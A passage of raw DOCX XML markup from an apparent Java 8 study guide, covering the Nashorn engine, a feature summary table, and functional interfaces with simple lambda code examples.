      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1EABEE" w14:textId="65D51B3B"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birth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9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n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718A924"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mutable, thread-safe, and more readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081DBD8C"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545C32E5">
          <v:rect id="_x0000_i1677" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FD53E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8. Nashorn JavaScript Engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8815D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Java to execute JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FC810" w14:textId="77777777"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660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ScriptEngine</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> engin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iptEngine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EngineBy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shorn"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A334E" w14:textId="5409D288"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>engin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va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nt('Hello JavaScript')"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0479E8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Deprecated in later versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DACEFF"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01954E1">
          <v:rect id="_x0000_i1678" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C43F6D0"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CE4B95" w14:paraId="1D1A5830" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26604BCD"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5748C0D4"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="4EC54BD5" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16B5F4BE"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Lambda Expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D7AE58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onymous functions for concise code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="72086DE3" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01FAFCA7"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Functional Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BB571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Target types for lambdas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="4E065379" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="486C8338"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Stream API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F2C89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Declarative collection processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="7B2CED13" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63BD2425"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efault/Static Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A207B73"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Method implementation in interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="22E16FEC" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="058FED3D"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Method References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D8CF008"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lambda expressions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="2A9C719A" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8F84E1"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Optional Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45E984E7"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voids null pointer exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="49915634" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EBEF90F"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ate and Time API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F65A5AB"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Modern date/time classes in </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>java.time</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> package</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w14:paraId="00C3BA3E" w14:textId="77777777" w:rsidTr="00B32BAB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67A4F4DC"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Nashorn Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E5292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JavaScript execution in Java (deprecated in later)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3E7194" w14:textId="77777777" w:rsidR="00B32BAB" w:rsidRPr="00CE4B95" w:rsidRDefault="00B32BAB" w:rsidP="00B32BAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F71F29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5" w:name="_Toc197867439"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Functional Interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
    </w:p>
    <w:p w14:paraId="144AF009" w14:textId="4272D5BD" w:rsidR="001A1145" w:rsidRPr="00CE4B95" w:rsidRDefault="001A1145"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but they must have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o be considered functional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E7380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a key component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introduced in Java 8). They allow you to treat instances of these interfaces as first-class functions, passing them as arguments to methods, returning them from methods, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565D253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a Functional Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6932BA"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A functional interface must have exactly one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CBE68F"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Have Multiple Default or Static Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can have default or static methods, but they don’t count towards the count of abstract methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D58BF63"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with Lambda Expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Functional interfaces are commonly used with lambda expressions or method references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2FEBA"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Functional Interfaces in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE2DD2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with run() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534B8BE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able (with call() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1443934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with compare() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7613F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 (with apply() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE99AC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 (with accept() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4151E"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 (with test() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0B02B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 (with get() method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7489E3"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Functional Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CAC98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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A243E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interface</w:t>
      </w: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41145C3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Single abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522C5F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lastRenderedPageBreak/>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oSomething</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62120EC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69CD543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default methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052481C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default</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efault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49245F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default method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A92FCCE"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3F95023"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1E843EBC"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static methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52677AF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static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6E5AA0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static method"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B7B26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094391D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p>
    <w:p w14:paraId="003F24C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11728BD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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FunctionalInterfaceExampl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726B444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main</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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1827D842"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Using Lambda Expression to implement the abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA00DF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myFunction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gt;</w:t>
      </w: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Doing something!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5644296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0FF50D2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the abstract method using lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4705E4CF"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oSomething</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827C50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38BE394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default and static methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7C77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efaultMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639CBB7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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>staticMethod</w:t>
      </w:r>
      <w:r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED0686D"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8D1C94A" w14:textId="6D2AAB8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r w:rsidRPr="00C023F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC7651"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483CC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ing something!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4F0A9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default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3656409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25F88C6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Functional Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2EA042"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d Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can pass behavior around as data (lambda expressions), simplifying code and improving readability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C6EC33"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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambdas and functional interfaces can help with performance optimizations, such as reducing boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286053C5"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Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enables functional programming patterns in Java, making it easier to work with data in an immutable and declarative manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A6DFB"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Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD9FF9C"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CE4B9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79" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB301F9" w14:textId="58CC0411" w:rsidR="00446460" w:rsidRPr="00CE4B95" w:rsidRDefault="00446460">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="_Toc197867440"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why we need Functional Interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w14:paraId="34EFC293" w14:textId="1A243D07" w:rsidR="00936CAC" w:rsidRPr="00CE4B95" w:rsidRDefault="00936CAC"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essential in Java, especially after the introduction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 They provide several benefits that simplify code, enhance readability, and support functional programming paradigms. Here’s why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are important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0859D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ing Lambda Expressions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A8DA6"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re one of the main features introduced in Java 8, and they are used to provide clear and concise syntax for writing code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C91AB5"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required for lambda expressions because lambdas are implemented as instances of these interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C125FE7"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functional interfaces, Java wouldn't be able to use lambdas effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F60C1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B8CDEC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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@FunctionalInterface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A72D8"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interface</w:t>
      </w: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0124B56B"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apply</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</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p>
    <w:p w14:paraId="78508164"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p>
    <w:p w14:paraId="4380CA06"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED30E6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lastRenderedPageBreak/>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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LambdaExample</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41DBCD5F"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static</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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862947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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Using Lambda Expression with Functional Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E5B89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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>add</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a</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </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Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6AD1A"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System</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00F40224">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
